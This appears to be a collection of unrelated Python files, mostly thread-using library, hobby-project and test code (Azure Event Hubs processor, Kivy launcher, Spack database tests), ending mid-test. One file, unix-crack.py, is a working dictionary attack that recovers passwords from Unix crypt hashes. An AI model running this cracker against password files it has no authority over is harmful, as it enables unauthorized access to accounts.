class _read_sock(io.StringIO):
def __init__(self, **kwargs):
self.newsock = kwargs.get('newsock')
self.rowsep = kwargs.get('rowsep')
self.datar = b""
def read(self, size=4096):
datl = 0
size = max(size, 4096)
notarow = True
while datl < size or notarow:
data = self.newsock[0].recv(size)
dl = len(data)
if dl:
datl += dl
self.datar += data
if notarow:
notarow = self.datar.count(self.rowsep) <= 0
else:
if len(self.datar) <= 0:
return ''
else:
break
data = self.datar.rpartition(self.rowsep)
datap = data[0]+data[1]
self.datar = data[2]
return datap.decode()
|
event_processor.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import random
import uuid
import logging
import time
import threading
from typing import (
Dict,
Callable,
List,
Any,
Union,
TYPE_CHECKING,
Optional,
Iterable,
cast,
)
from functools import partial
from .._utils import get_event_links
from .partition_context import PartitionContext
from .in_memory_checkpoint_store import InMemoryCheckpointStore
from .ownership_manager import OwnershipManager
from .common import CloseReason, LoadBalancingStrategy
from ._eventprocessor_mixin import EventProcessorMixin
if TYPE_CHECKING:
from datetime import datetime
from .checkpoint_store import CheckpointStore
from .._common import EventData
from .._consumer import EventHubConsumer
from .._consumer_client import EventHubConsumerClient
_LOGGER = logging.getLogger(__name__)
class EventProcessor(
EventProcessorMixin
): # pylint:disable=too-many-instance-attributes
"""
An EventProcessor constantly receives events from one or multiple partitions of the Event Hub
in the context of a given consumer group.
"""
def __init__(
self,
eventhub_client, # type: EventHubConsumerClient
consumer_group, # type: str
on_event, # type: Callable[[PartitionContext, Union[Optional[EventData], List[EventData]]], None]
**kwargs # type: Any
):
# type: (...) -> None
# pylint: disable=line-too-long
self._consumer_group = consumer_group
self._eventhub_client = eventhub_client
self._namespace = (
eventhub_client._address.hostname # pylint: disable=protected-access
)
self._eventhub_name = eventhub_client.eventhub_name
self._event_handler = on_event
self._batch = kwargs.get("batch") or False
self._max_batch_size = kwargs.get("max_batch_size") or 300
self._max_wait_time = kwargs.get("max_wait_time")
self._partition_id = kwargs.get("partition_id", None) # type: Optional[str]
self._error_handler = kwargs.get(
"on_error", None
) # type: Optional[Callable[[PartitionContext, Exception], None]]
self._partition_initialize_handler = kwargs.get(
"on_partition_initialize", None
) # type: Optional[Callable[[PartitionContext], None]]
self._partition_close_handler = kwargs.get(
"on_partition_close", None
) # type: Optional[Callable[[PartitionContext, CloseReason], None]]
checkpoint_store = kwargs.get("checkpoint_store") # type: Optional[CheckpointStore]
self._checkpoint_store = checkpoint_store or InMemoryCheckpointStore()
self._initial_event_position = kwargs.get(
"initial_event_position", "@latest"
) # type: Union[str, int, datetime, Dict[str, Any]]
self._initial_event_position_inclusive = kwargs.get(
"initial_event_position_inclusive", False
) # type: Union[bool, Dict[str, bool]]
self._load_balancing_interval = kwargs.get(
"load_balancing_interval", 10.0
) # type: float
self._load_balancing_strategy = kwargs.get("load_balancing_strategy") or LoadBalancingStrategy.GREEDY
self._ownership_timeout = kwargs.get(
"partition_ownership_expiration_interval", self._load_balancing_interval * 6)
self._partition_contexts = {} # type: Dict[str, PartitionContext]
# Receive parameters
self._owner_level = kwargs.get("owner_level", None) # type: Optional[int]
if checkpoint_store and self._owner_level is None:
self._owner_level = 0
self._prefetch = kwargs.get("prefetch", None) # type: Optional[int]
self._track_last_enqueued_event_properties = kwargs.get(
"track_last_enqueued_event_properties", False
)
self._id = str(uuid.uuid4())
self._running = False
self._lock = threading.RLock()
self._consumers = {} # type: Dict[str, EventHubConsumer]
self._ownership_manager = OwnershipManager(
self._eventhub_client,
self._consumer_group,
self._id,
self._checkpoint_store,
self._ownership_timeout,
self._load_balancing_strategy,
self._partition_id,
)
def __repr__(self):
# type: () -> str
return "EventProcessor: id {}".format(self._id)
def _process_error(self, partition_context, err):
if self._error_handler:
try:
self._error_handler(partition_context, err)
except Exception as err_again: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_error. The exception is %r.",
self._id,
partition_context.eventhub_name,
partition_context.partition_id,
partition_context.consumer_group,
err_again,
)
def _cancel_tasks_for_partitions(self, to_cancel_partitions):
# type: (Iterable[str]) -> None
with self._lock:
_LOGGER.debug(
"EventProcessor %r tries to cancel partitions %r",
self._id,
to_cancel_partitions
)
for partition_id in to_cancel_partitions:
if partition_id in self._consumers:
self._consumers[partition_id].stop = True
_LOGGER.info(
"EventProcessor %r has cancelled partition %r",
self._id,
partition_id
)
def _initialize_partition_consumer(self, partition_id):
if self._partition_initialize_handler:
try:
self._partition_initialize_handler(self._partition_contexts[partition_id])
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_partition_initialize. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
err,
)
self._process_error(self._partition_contexts[partition_id], err)
_LOGGER.info(
"EventProcessor %r has claimed partition %r",
self._id,
partition_id
)
def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None):
# type: (Iterable[str], Optional[Dict[str, Dict[str, Any]]]) -> None
with self._lock:
_LOGGER.debug(
"EventProcessor %r tries to claim partition %r",
self._id,
claimed_partitions
)
for partition_id in claimed_partitions:
if partition_id not in self._consumers:
if partition_id in self._partition_contexts:
partition_context = self._partition_contexts[partition_id]
partition_context._last_received_event = None # pylint:disable=protected-access
else:
partition_context = PartitionContext(
self._namespace,
self._eventhub_name,
self._consumer_group,
partition_id,
self._checkpoint_store,
)
self._partition_contexts[partition_id] = partition_context
checkpoint = checkpoints.get(partition_id) if checkpoints else None
(
initial_event_position,
event_postition_inclusive,
) = self.get_init_event_position(partition_id, checkpoint)
event_received_callback = partial(
self._on_event_received, partition_context
)
self._consumers[partition_id] = cast(
"EventHubConsumer",
self.create_consumer(
partition_id,
initial_event_position,
event_postition_inclusive,
event_received_callback,
),
)
self._initialize_partition_consumer(partition_id)
def _on_event_received(self, partition_context, event):
# type: (PartitionContext, Union[Optional[EventData], List[EventData]]) -> None
if event:
try:
partition_context._last_received_event = event[-1] # type: ignore #pylint:disable=protected-access
except TypeError:
partition_context._last_received_event = event # type: ignore #pylint:disable=protected-access
links = get_event_links(event)
with self._context(links=links):
self._event_handler(partition_context, event)
else:
self._event_handler(partition_context, event)
def _load_balancing(self):
# type: () -> None
"""Start the EventProcessor.
The EventProcessor will try to claim and balance partition ownership with other `EventProcessor`
and start receiving EventData from EventHub and processing events.
:return: None
"""
while self._running:
random_jitter = self._load_balancing_interval * random.random() * 0.2
load_balancing_interval = self._load_balancing_interval + random_jitter
try:
claimed_partition_ids = self._ownership_manager.claim_ownership()
if claimed_partition_ids:
existing_pids = set(self._consumers.keys())
claimed_pids = set(claimed_partition_ids)
to_cancel_pids = existing_pids - claimed_pids
newly_claimed_pids = claimed_pids - existing_pids
if newly_claimed_pids:
checkpoints = (
self._ownership_manager.get_checkpoints()
if self._checkpoint_store
else None
)
self._create_tasks_for_claimed_ownership(
newly_claimed_pids, checkpoints
)
else:
_LOGGER.info(
"EventProcessor %r hasn't claimed an ownership. It keeps claiming.",
self._id,
)
to_cancel_pids = set(self._consumers.keys())
if to_cancel_pids:
self._cancel_tasks_for_partitions(to_cancel_pids)
except Exception as err: # pylint:disable=broad-except
# ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions
# when there are load balancing and/or checkpointing (checkpoint_store isn't None).
# They're swallowed here to retry every self._load_balancing_interval seconds.
# Meanwhile this event processor won't lose the partitions it has claimed before.
# If it keeps failing, other EventProcessors will start to claim ownership of the partitions
# that this EventProcessor is working on. So two or multiple EventProcessors may be working
# on the same partition for a short while.
# Setting owner_level would create exclusive connection to the partition and
# alleviate duplicate-receiving greatly.
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r consumer group %r. "
"An error occurred while load-balancing and claiming ownership. "
"The exception is %r. Retrying after %r seconds",
self._id,
self._eventhub_name,
self._consumer_group,
err,
load_balancing_interval
)
self._process_error(None, err) # type: ignore
time.sleep(load_balancing_interval)
def _close_consumer(self, partition_id, consumer, reason):
# type: (str, EventHubConsumer, CloseReason) -> None
consumer.close()
with self._lock:
del self._consumers[partition_id]
_LOGGER.info(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" is being closed. Reason is: %r",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
reason,
)
if self._partition_close_handler:
try:
self._partition_close_handler(self._partition_contexts[partition_id], reason)
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_partition_close. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
err,
)
self._process_error(self._partition_contexts[partition_id], err)
self._ownership_manager.release_ownership(partition_id)
def _do_receive(self, partition_id, consumer):
# type: (str, EventHubConsumer) -> None
"""Call the consumer.receive() and handle exceptions if any after it exhausts retries.
"""
try:
consumer.receive(self._batch, self._max_batch_size, self._max_wait_time)
except Exception as error: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while receiving. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
error,
)
self._process_error(self._partition_contexts[partition_id], error)
self._close_consumer(
partition_id, consumer, CloseReason.OWNERSHIP_LOST
)
def start(self):
# type: () -> None
if self._running:
_LOGGER.info("EventProcessor %r has already started.", self._id)
return
_LOGGER.info("EventProcessor %r is being started", self._id)
self._running = True
thread = threading.Thread(target=self._load_balancing)
thread.daemon = True
thread.start()
while self._running:
for partition_id, consumer in list(self._consumers.items()):
if consumer.stop:
self._close_consumer(
partition_id, consumer, CloseReason.OWNERSHIP_LOST
)
continue
self._do_receive(partition_id, consumer)
with self._lock:
for partition_id, consumer in list(self._consumers.items()):
self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN)
def stop(self):
# type: () -> None
"""Stop the EventProcessor.
The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions
it is working on.
Other running EventProcessor will take over these released partitions.
A stopped EventProcessor can be restarted by calling method `start` again.
:return: None
"""
if not self._running:
_LOGGER.info("EventProcessor %r has already been stopped.", self._id)
return
self._running = False
_LOGGER.info("EventProcessor %r has been stopped.", self._id)
|
upnp.py
|
import logging
import threading
from queue import Queue
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
def __init__(self):
self.queue = Queue()
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
self.upnp.deleteportmapping(port, "TCP")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "tst", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
self.upnp.deleteportmapping(port, "TCP")
log.info(f"Port {port} closed with UPnP")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run tst, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
self.queue.put(("shutdown",))
self.thread.join()
def __del__(self):
self.shutdown()
|
unix-crack.py
|
import argparse
import crypt
import threading
from multiprocessing import Pool, Queue
queue = Queue()
def test_pass(user, crypt_pass, dict_words):
salt = crypt_pass[0:2]
for word in dict_words:
crypt_word = crypt.crypt(word, salt)
if crypt_word.strip() == crypt_pass.strip():
queue.put('Password for %s is: %s' % (user, word))
return
queue.put('Password for %s not found' % user)
class UnixPasswordCracker(object):
"""
Uses a simple dictionary based brute-force attack to guess a user's
password by hashing the dictionary word and then checking for equality
against the existing hash.
passwords.txt
dictionary.txt
"""
pool = Pool(processes=5)
def use_threading(self, func, args):
thread = threading.Thread(target=func, args=args)
thread.start()
thread.join()
def use_multithreaded_pools(self, func, args):
return self.pool.apply_async(func, args)
def main(self, mode=None):
dictionary = 'dictionary.txt'
with open(dictionary, 'r') as f:
dict_words = [line.strip('\n').strip() for line in f.readlines()]
passwords = 'passwords.txt'
with open(passwords, 'r') as f:
for line in f.readlines():
if ":" in line:
user = line.split(':')[0]
crypt_pass = line.split(':')[1].strip(' ')
args = [user, crypt_pass, dict_words]
if mode == 'threading':
self.use_threading(test_pass, args)
elif mode == 'pool':
self.use_multithreaded_pools(test_pass, args)
else:
test_pass(*args)
self.pool.close()
self.pool.join()
# print the queue items
while not queue.empty():
print(queue.get())
if __name__ == "__main__":
mode = None
parser = argparse.ArgumentParser()
parser.add_argument("--mode", help="Valid choices: 'pool' and 'threading'")
args = parser.parse_args()
if args.mode:
mode = args.mode
UnixPasswordCracker().main(mode=mode)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
import random
app = Flask('')
@app.route('/')
def home():
return 'Im in!'
def run():
app.run(
host='0.0.0.0',
port=random.randint(2000,9000)
)
def keep_alive():
'''
Creates and starts new thread that runs the function run.
'''
t = Thread(target=run)
t.start()
|
main.py
|
import asyncio
import json
import logging
import websockets
import os
import threading
import socket
from utils.crypto import encryptImage
from utils.socket import recvall
# Env
SERVER_PORT = os.getenv('SERVER_PORT', 6789)
SERVER_URL = os.getenv('SERVER_URL', "localhost")
# Setup logging
logging.basicConfig()
# Body response
CONNECTED_RESPONSE = {
"status": "ok",
"type": "info",
"response": "Connection established"
}
async def handleEncryptImage(ws, image):
#Create socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6791))
s.send(json.dumps({
"option": "processImage",
"data": encryptImage(image).decode()
}).encode(), 8192)
response = recvall(s).decode()
parsedRes = json.loads(response)
await ws.send(json.dumps({
"status": "ok",
"type": "result_image",
"image": parsedRes['image']
}))
async def init_connection(websocket, path):
try:
await websocket.send(json.dumps(CONNECTED_RESPONSE))
async for message in websocket:
data = json.loads(message)
if data['option'] == 'uploadImage':
_thread = threading.Thread(target=asyncio.run, args=(handleEncryptImage(websocket, data['image'] ),))
_thread.start()
except:
print("Error starting server")
# Start server
start_server = websockets.serve(init_connection, SERVER_URL, SERVER_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
|
silvia-pi.py
|
#!/usr/bin/python3
import logging
from datetime import datetime as dt
logger = logging.getLogger('silvia')
logger.setLevel(logging.INFO)
fh = logging.FileHandler('/home/pi/silvia-pi/logs/%s.log' % dt.strftime(dt.now(), '%Y-%m-%d'))
fh.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
def he_control_loop(lock,state):
from heat import Heat
try:
heat_control = Heat(state)
heat_control.run()
except Exception as e:
logger.error(e)
finally:
logger.info("----------------Closing heat control----------------")
heat_control.cleanup()
def pid_loop(lock,state):
from sensor import Sensor
try:
pid = Sensor(state)
pid.run()
except Exception as e:
logger.error(e)
finally:
logger.info("--------------------Closing PID---------------------")
pid.cleanup()
def pygame_gui(lock, state):
from chart import Chart
try:
Chart.start_pygame()
c = Chart(0.5, 30, state)
c.run()
except Exception as e:
logger.error(e)
finally:
logger.info("--------------------Closing GUI---------------------")
Chart.stop_pygame()
def gpio_temp_control(lock, state):
from gpiozero import Button
from time import time
from config import config
import os
os.system('gpio -g mode 18 pwm | gpio pwmc 1000 | gpio -g pwm 18 800')
def increase():
logger.info("Increase button pressed")
state['settemp'] += 0.2
config.set_temp = state['settemp']
config.save()
def decrease():
logger.info("Decrease button pressed")
state['settemp'] -= 0.2
config.set_temp = state['settemp']
config.save()
def toggle():
logger.info("Exit button pressed")
state['on'] = not state['on']
if state['on']:
os.system('gpio -g pwm 18 800')
else:
os.system('gpio -g pwm 18 100')
def set_boost():
logger.info("Heating for 5 seconds")
state['boost'] = time() + 5
up = Button(17)
up.when_pressed = increase
down = Button(22)
down.when_pressed = decrease
kill = Button(27)
kill.when_pressed = toggle
boost = Button(23)
boost.when_pressed = set_boost
return up, down, kill, boost
def print_exception(*info):
import traceback
tb = ''.join(traceback.format_exception(*info))
logger.error("Uncaught error: ")
logger.error(tb)
if __name__ == '__main__':
from multiprocessing import Process, Manager, Lock
from time import sleep
from config import config as conf
import sys
from formatter import PartialFormatter
sys.excepthook = print_exception
lock = Lock()
manager = Manager()
pidstate = manager.dict()
pidstate['snooze'] = conf.snooze
pidstate['snoozeon'] = False
pidstate['i'] = 0
pidstate['settemp'] = conf.set_temp
pidstate['avgpid'] = 0.
pidstate['temp'] = 0.
pidstate['heating'] = False
pidstate['avgtemp'] = None
pidstate['exit'] = False
pidstate['pterm'] = None
pidstate['iterm'] = None
pidstate['dterm'] = None
pidstate['sterm'] = None
pidstate['pidval'] = None
pidstate['boost'] = 0
pidstate['on'] = True
pidstate['gui_on'] = False
logger.info('Main process started')
logger.info('Starting PID loop')
p = Process(target=pid_loop,args=(lock, pidstate))
p.daemon = True
p.start()
logger.info('Starting heat control')
h = Process(target=he_control_loop,args=(lock, pidstate))
h.daemon = True
h.start()
logger.info('Starting GUI')
gui = Process(target=pygame_gui, args=(lock, pidstate))
gui.daemon = True
gui.start()
while not pidstate['gui_on']:
sleep(1)
up, down, kill, boost = gpio_temp_control(lock, pidstate)
logger.info('Buttons assigned')
logger.info('Starting status loop')
fmt = PartialFormatter()
dir(fmt)
while p.is_alive and gui.is_alive and h.is_alive and not pidstate['exit']:
try:
print(fmt.format('P: {pterm:7.2f}\tI: {iterm:7.2f}\tD: {dterm:7.2f}\tS: {sterm:7.2f}\tOut: {pidval:7.2f} Avg PID: {avgpid:7.2f}\tTemp: {temp:7.2f}\tAvg Temp: {avgtemp:7.2f}', **pidstate))
sleep(1)
except KeyboardInterrupt:
logger.error('Keyboard interrupt, exiting')
break
except Exception as e:
logger.error('Error in status loop:')
logger.error(str(e))
break
logger.info('Killing PID process')
p.terminate()
logger.info('Killing heat control process')
h.terminate()
logger.info('Killing GUI process')
gui.terminate()
p.join()
h.join()
gui.join()
logging.info('All threads joined, exiting')
|
interactive.py
|
'''
Interactive launcher
====================
.. versionadded:: 1.3.0
.. versionchanged:: 1.9.2
The interactive launcher has been deprecated.
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(text='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file to have
already an interpreter, and copy/paste all the lines. You'll still have the
interpreter at the end + the kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of it's attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an Ipython shell. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clocks' <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e. ::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
import inspect
from threading import Thread, Event
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from kivy.utils import deprecated
def safeWait(dt):
EventLoop.confirmed.set()
EventLoop.safe.wait()
EventLoop.confirmed.clear()
def unwrap(ob):
while type(ob) == SafeMembrane:
ob = ob._ref
return ob
class SafeMembrane(object):
'''
This help is for a proxy object. Did you want help on the proxy's referent
instead? Try using help(<instance>._ref)
The SafeMembrane is a threadsafe proxy that also returns attributes as new
thread-safe objects
and makes thread-safe method calls, preventing thread-unsafe objects
from leaking into the user's environment.
'''
__slots__ = ('_ref', 'safe', 'confirmed')
def __init__(self, ob, *args, **kwargs):
self.confirmed = EventLoop.confirmed
self.safe = EventLoop.safe
self._ref = ob
def safeIn(self):
"""Provides a thread-safe entry point for interactive launching."""
self.safe.clear()
Clock.schedule_once(safeWait, -1)
self.confirmed.wait()
def safeOut(self):
"""Provides a thread-safe exit point for interactive launching."""
self.safe.set()
def isMethod(self, fn):
return inspect.ismethod(fn)
# Everything from this point on is just a series of thread-safing proxy
# methods that make calls against _ref and threadsafe whenever data will be
# written to or if a method will be called. SafeMembrane instances should
# be unwrapped whenever passing them into the thread
# use type() to determine if an object is a SafeMembrane while debugging
def __repr__(self):
return self._ref.__repr__()
def __call__(self, *args, **kw):
self.safeIn()
args = list(map(unwrap, args))
for k in list(kw.keys()):
kw[k] = unwrap(kw[k])
r = self._ref(*args, **kw)
self.safeOut()
if r is not None:
return SafeMembrane(r)
def __getattribute__(self, attr, oga=object.__getattribute__):
if attr.startswith('__') or attr == '_ref':
subject = oga(self, '_ref')
if attr == '_ref':
return subject
return getattr(subject, attr)
return oga(self, attr)
def __getattr__(self, attr, oga=object.__getattribute__):
r = getattr(oga(self, '_ref'), attr)
return SafeMembrane(r)
def __setattr__(self, attr, val, osa=object.__setattr__):
if (attr == '_ref' or
hasattr(type(self), attr) and not attr.startswith('__')):
osa(self, attr, val)
else:
self.safeIn()
val = unwrap(val)
setattr(self._ref, attr, val)
self.safeOut()
def __delattr__(self, attr, oda=object.__delattr__):
self.safeIn()
delattr(self._ref, attr)
self.safeOut()
def __bool__(self):
return bool(self._ref)
def __getitem__(self, arg):
return SafeMembrane(self._ref[arg])
def __setitem__(self, arg, val):
self.safeIn()
val = unwrap(val)
self._ref[arg] = val
self.safeOut()
def __delitem__(self, arg):
self.safeIn()
del self._ref[arg]
self.safeOut()
def __getslice__(self, i, j):
return SafeMembrane(self._ref[i:j])
def __setslice__(self, i, j, val):
self.safeIn()
val = unwrap(val)
self._ref[i:j] = val
self.safeOut()
def __delslice__(self, i, j):
self.safeIn()
del self._ref[i:j]
self.safeOut()
def __enter__(self, *args, **kwargs):
self.safeIn()
self._ref.__enter__(*args, **kwargs)
def __exit__(self, *args, **kwargs):
self._ref.__exit__(*args, **kwargs)
self.safeOut()
class InteractiveLauncher(SafeMembrane):
'''
Proxy to an application instance that launches it in a thread and
then returns and acts as a proxy to the application in the thread.
'''
__slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')
@deprecated
def __init__(self, app=None, *args, **kwargs):
if app is None:
app = App()
EventLoop.safe = Event()
self.safe = EventLoop.safe
self.safe.set()
EventLoop.confirmed = Event()
self.confirmed = EventLoop.confirmed
self.app = app
def startApp(app=app, *args, **kwargs):
app.run(*args, **kwargs)
self.thread = Thread(target=startApp, *args, **kwargs)
def run(self):
self.thread.start()
# Proxy behavior starts after this is set. Before this point, attaching
# widgets etc can only be done through the Launcher's app attribute
self._ref = self.app
def stop(self):
EventLoop.quit = True
self.thread.join()
# Act like the app instance even before _ref is set
def __repr__(self):
return self.app.__repr__()
|
database.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
try:
import uuid
_use_uuid = True
except ImportError:
_use_uuid = False
pass
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.util.mock_package import MockPackageMultiRepo
from spack.util.executable import Executable
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('w', [x, y], [default, default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
mock_repo.add_package('y', [z], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
with spack.repo.swap(mock_repo):
